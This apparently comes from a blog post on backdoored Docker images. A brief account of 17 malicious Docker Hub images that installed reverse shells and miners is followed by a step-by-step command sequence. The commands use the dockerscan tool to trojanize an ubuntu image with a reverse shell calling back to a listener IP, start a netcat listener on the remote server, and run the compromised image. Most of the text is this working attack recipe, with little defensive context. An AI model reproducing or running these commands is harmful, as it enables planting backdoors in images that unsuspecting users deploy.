Over the past year, there were 17 backdoored Docker images identified and removed from Docker Hub. These malicious images, uploaded under the pseudonym “docker123321,” were used to install reverse shells and cryptocurrency miners on users’ servers. The images were available on Docker Hub between May 2017 and May 2018 before they were taken down. This situation highlights the importance of vigilance and the need for security measures when using public repositories to pull Docker images​. (The New Stack)
Table of Contents
git clone https://github.com/cr0hn/dockerscan
cd dockerscan
sudo python3.6 setup.py install
mkdir backdoor && cd backdoor
docker pull ubuntu:latest
docker save ubuntu:latest -o ubuntu-orginal
export LC_ALL=C.UTF-8
export LANG=C.UTF-8
dockerscan image modify trojanize ubuntu-orginal <listener_ip> -p 45678 -o ubuntu-trojanized
docker load -i ubuntu-trojanized.tar
remote_server> nc -l 45678
docker run -d ubuntu-trojanized